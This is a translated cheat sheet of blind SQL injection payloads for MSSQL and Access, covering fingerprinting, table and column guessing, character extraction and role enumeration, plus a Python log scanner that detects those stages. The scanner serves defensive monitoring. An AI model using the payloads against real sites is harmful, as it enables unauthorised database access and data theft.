Placeholders kept from the original payloads: [查询条件] = the condition being tested; [数据库名] / 数据库名 = the name used in the FROM clause (the author calls it the database name); 字段名 = column name.

1. Test whether the parameter is injectable: ;and 1=1 and ;and 1=2
2. Preliminary test for MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [查询条件] and ''='
4. When a search parameter is not filtered: 'and [查询条件] and '%25'='
5. Identify the database system:
   ;and (select count(*) from sysobjects)>0    -> MSSQL
   ;and (select count(*) from msysobjects)>0   -> Access
6. Guess the database name: ;and (select Count(*) from [数据库名])>0
7. Guess a column name: ;and (select Count(字段名) from 数据库名)>0
8. Guess the length of a record in the column: ;and (select top 1 len(字段名) from 数据库名)>0
9. Guess the ASCII value of the column's characters:
   (1) Access: ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
   (2) MSSQL: ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10. Test the privilege structure (MSSQL):
   ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
   ;and 1=(select IS_MEMBER('db_owner'));--
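As an added, defensive example (not part of the original list): Python detection logic that recognises the probing stages above in web-server access logs and alerts on a source that walks more than one stage. It assumes a Common Log Format layout; the signature tags, the log lines and the IPs are constructed here.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures follow the payload shapes of the probing steps listed above,
# tagged with the stage each belongs to.
SIGNATURES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("mssql-user-check", re.compile(r"\band\s+user\s*>\s*0", re.I)),
    ("dbms-fingerprint", re.compile(r"\bfrom\s+m?sysobjects\b", re.I)),
    ("blind-count-probe", re.compile(r"\bselect\s+count\s*\(", re.I)),
    ("blind-length-probe", re.compile(r"\bselect\s+top\s+1\s+len\s*\(", re.I)),
    ("blind-char-probe", re.compile(r"\b(?:asc\s*\(\s*mid|unicode\s*\(\s*substring)\s*\(", re.I)),
    ("mssql-role-probe", re.compile(r"\bis_(?:srvrolemember|member)\s*\(", re.I)),
]
# Assumed log layout: Common Log Format; the sample lines below are constructed.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 4120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.asp?id=12;and%201=1 HTTP/1.1" 200 4120
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news.asp?id=12;and%201=2 HTTP/1.1" 200 310
203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /news.asp?id=12;and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 4120
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news.asp?id=12;and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));-- HTTP/1.1" 200 4120
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /search.asp?q=band+and+orchestra HTTP/1.1" 200 2200
""".splitlines()

def classify_request(target: str) -> list[str]:
    """Tags matched by one URL-decoded request target, in stage order."""
    decoded = unquote_plus(target)
    return [tag for tag, rx in SIGNATURES if rx.search(decoded)]

def scan_log(lines) -> dict[str, set[str]]:
    """Map each client IP to the set of probing stages observed from it."""
    stages = defaultdict(set)
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            ip, target = m.groups()
            stages[ip].update(classify_request(target))
    return dict(stages)

def alerts(stages: dict[str, set[str]], min_stages: int = 2) -> list[str]:
    """One boolean probe is noisy; alert on sources walking several stages."""
    return sorted(ip for ip, s in stages.items() if len(s) >= min_stages)

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip in alerts(found):
        print(ip, sorted(found[ip]))
```

The stage tags map one-to-one onto the numbered steps above, so a triage analyst can see how far a source got (fingerprinting, blind extraction, role enumeration) rather than only that "and 1=1" appeared.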